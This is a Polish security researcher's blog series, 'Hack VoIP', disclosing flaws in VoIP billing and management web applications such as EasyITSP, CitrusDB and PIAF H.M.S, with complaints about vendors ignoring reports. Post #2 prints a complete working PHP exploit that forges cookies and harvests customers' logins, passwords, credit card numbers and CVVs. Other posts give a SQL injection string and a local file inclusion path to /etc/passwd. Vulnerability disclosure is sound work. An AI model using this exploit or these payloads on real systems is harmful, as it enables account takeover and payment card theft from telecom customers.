Hack VoIP #6 - Voice Logger astTECS

Voice Logger astTECS - bypass login & arbitrary file download

Dzisiaj, o błędach w Voice Logger firmy astTECS i o moim doświadczeniu w zgłoszeniu / w próbie zgłoszenia tej podatności. Usiłowałem i nie dałem rady. Próbowałem przez LiveChat na stronie firmy, próbowałem pisać maile do techniki. Nic, zero odzewu i zero zainteresowania ( no może oprócz Pani z LiveChata, która to skierowała mnie do techniki), a czekałem chyba z miesiąc z publikacją.

Hack VoIP #5 - vBilling dla FreeSWITCH

W tym wpisie znowu poruszę tematykę bezpieczeństwa systemów VoIP, a raczej ich front-end’ów. Tym razem odeszłem troszeczkę od rozwiązań przeznaczonych do współpracy z programową centralą telefoniczną Asterisk, a zająłem się rozwiązaniami open source dla FreeSWITCH. W sumie to aktualnie jednym takim rozwiązaniem jakim jest vBilling.

hack voip #0

Ostatnio na bloga wrzuciłem kilka informacji o błędach wykrytych w open source'owych systemach VoIP i nie piszę tutaj o centralach PBX itp, tylko o aplikacjach webowych, które
są odpowiedzialne za billingowanie i zarządzanie platformą VoIP. Stąd też pomysł, aby wpisy te tytułować jako projekt hack voip.

Hack VoIP #4 - Niebezpieczny system telekomunikacyjny - EasyITSP

EasyITSP by Lemens Telephone Systems <= 2.0.7

Drugie podejście do systemu telekomunikacyjnego EasyITSP firmy Lemens Telephone.  Odkryty przeze mnie błąd polega na możliwości wyszukiwania, odczytywania i usuwania plików *.txt  na serwerze, oraz odsłuchiwania poczty głosowej innych użytkowników tego systemu VoIP dzięki atakowi directory traversal - w sumie to nic wielkiego nawet gdy weźmie się pod uwagę to, żeby wykonać atak należy wcześniej być zalogowanym - na szczęście atakującego jako klient, a nie administrator czy reseller.

Błąd pokazuje tylko tyle, że firma Lemens Telephone, która jest autorem systemu telekomunikacyjnego EasyITSP nie za bardzo bierze pod uwagę bezpieczeństwo klientów korzystających z ich systemu VoIP.

Dobre jest przynajmniej to, że Lemens wskazane błędy stara się poprawiać, ale nie informuje nikogo dlaczego wprowadza daną poprawkę. Mam tu na myśli już raz opublikowany przeze mnie exploit za którego pomocą można było poznać wszystkie loginy, hasła oraz dane kart kredytowych użytkowników usług telekomunikacyjnych wykorzystujących system EasyITSP. Błąd zaliczyć należało jako krytyczny, a w ChangeLogu dołączonym do systemu EasyITSP przeczytamy tylko:

....
#################################################
2012-10-31 - Matthew Lemens <support@lemens-ts.com>
        new login system for admin/customer
 ....

Problem w tym, że z takim podejściem  mało kto zaktualizuje wersję swojego EasyITSP bo nie wie o krytycznej luce, którą spotkać można do tej pory w niektórych instalacjach systemu firmy Lemens Telephone.

Wracając do samego błędu, którego tematem miał być ten wpis. Problem znajduje się w pliku voicemail.php w linii 220.

Hack VoIP #3 - PIAF H.M.S - SQL Injection

Kolejny system VoIP wzięty pod lupę i po 5 minutach kilka znalezionych błędów. Poniżej publikuję tylko jeden SQL Injection. Resztę znajdziecie sami :)


System ten można spotkać głównie w hotelach.

PIAF H.M.S
Hospitality Management System
Źródła: http://code.google.com/p/piafhms/


file: bills.php
line: 86-87

        $query = $query . " ORDER BY ID DESC";
        printf($query); 

query:
SELECT * FROM `Users` WHERE `Room` = 'anything' OR 'x'='x' ORDER BY ID DESC

Hack VoIP #2 - Exploit - EasyITSP by Lemens Telephone Systems 2.0.2

From EasyITSP website:

"The easiest ITSP and Hosted PBX software available. PERIOD! Lemens-TS has thousands of man hours in developing a solution with the smallest footprint possible. The goal was to keep things as simple as we could. Victory is ours."

:)

Exploit code:

<?php

error_reporting(0);
$arguments = getopt("a:b:c:");
$url = $arguments['a'];
$id_pod =$arguments['b'];
$id_end =$arguments['c'];
if(count($arguments)!=3)
{
echo '## Exploit - EasyITSP by Lemens Telephone Systems 2.0.2   '."\n";
echo '## Discovery users with passwords       '."\n";
echo '##         '."\n";
echo '## Author: Michal Blaszczak       '."\n";
echo '## Website: blaszczakm.blogspot.com            '."\n";
echo '## Date: 10.10.2012       '."\n";
echo '##         '."\n";
echo '## Greatz: cond, packet, jestemka1pi, sid, chez            '."\n";
echo '##         #pakamera@freenode     '."\n";
echo '##         (old) #2600@ircnet     '."\n";
echo '##         (old) #mamo_mamo_jestem_chakerem@ircnet '."\n";
echo '##         '."\n";
echo '## Usage:         '."\n";
echo '## php exploit.php -a URL -b ID_START -c ID_STOP      '."\n";
echo '##         '."\n";
echo '## Example:        '."\n";
echo '## php exploit.php -a http://lemens-ts.com/easyitsp/customer/ -b 5 -c 10'."\n";

exit;
}
$url2='customers_edit.php?currentpage=customers';
$url.=$url2;
for ($id_pod; $id_pod <= $id_end; $id_pod++) {
$cookie = 'cust_verify=' . urlencode('#pakamera') . '; cust_id=' . urlencode($id_pod);
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_POST, 1);//przesylamy metodą post
curl_setopt($ch, CURLOPT_POSTFIELDS, "customersid=$id_pod"); //dane do wyslania
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$intro = curl_exec($ch);
curl_close($ch);

$regex_login = '#\<td title="Customer username for portal"\>(.+?)\<\/td\>#s';
preg_match($regex_login, $intro, $login);

$regex_pass = '#\<td title="Customer password for portal"><input type="password" name="password" required="1" maxlength="45" value="(.+?)"\>\<\/td\>#s';
preg_match($regex_pass, $intro, $pass);

$regex_ccnum = '#\<td title="Customer cc number"><input type="text" name="ccnumber" maxlength="20" value="(.+?)"\>\<\/td\>#s';
preg_match($regex_ccnum, $intro, $ccnum);

$regex_ccexpire = '#\<td title="Customer cc expire"><input type="text" name="ccexpire" maxlength="8" value="(.+?)"\>\<\/td\>#s';
preg_match($regex_ccexpire, $intro, $ccexpire);

$regex_cccvv = '#\<td title="Customer credit card CVV"><input type="text" name="cccvv" maxlength="6" value="(.+?)"\>\<\/td\>#s';
preg_match($regex_cccvv, $intro, $cccvv);


 $test = explode(" ",$login[1]);


 if(trim($test[0])!='</td>')
 {
 echo 'ID:'.$id_pod."\n";
 echo 'LOGIN:'.$login[1]."\n";
 echo 'Password:'.$pass[1]."\n";
 echo 'CCnumber:'.$ccnum[1]."\n";
 echo 'CCexpire:'.$ccexpire[1]."\n";
 echo 'CCCVV:'.$cccvv[1]."\n\n";
 }
}

?>

Source: http://pastebin.com/SmQVfBBD

VoIP Hack #1 - CitrusDB 2.4.1 - LFI/SQLi Vulnerability

CitrusDB is an open source customer service and billing database. It can be used by customer service personnel to provide sales and support to customers, and by billing staff to bill customers for their services via invoices and credit card batches. Customers may access the Online customer account manager to view their services, billing history, and make service and support requests online.

  1) LFI

http://192.168.51.8/lab/citrus-2.4.1/index.php?load=../../../../../etc/passwdtype=base

index.php:315

$filepath = "$path_to_citrus/$load.php";
if (file_exists($filepath)) {
include('./'.$load.'.php');


2) SQL INJECTION

include/user.class.php:134

$sql="SELECT password FROM user WHERE username='$user_name' LIMIT 1";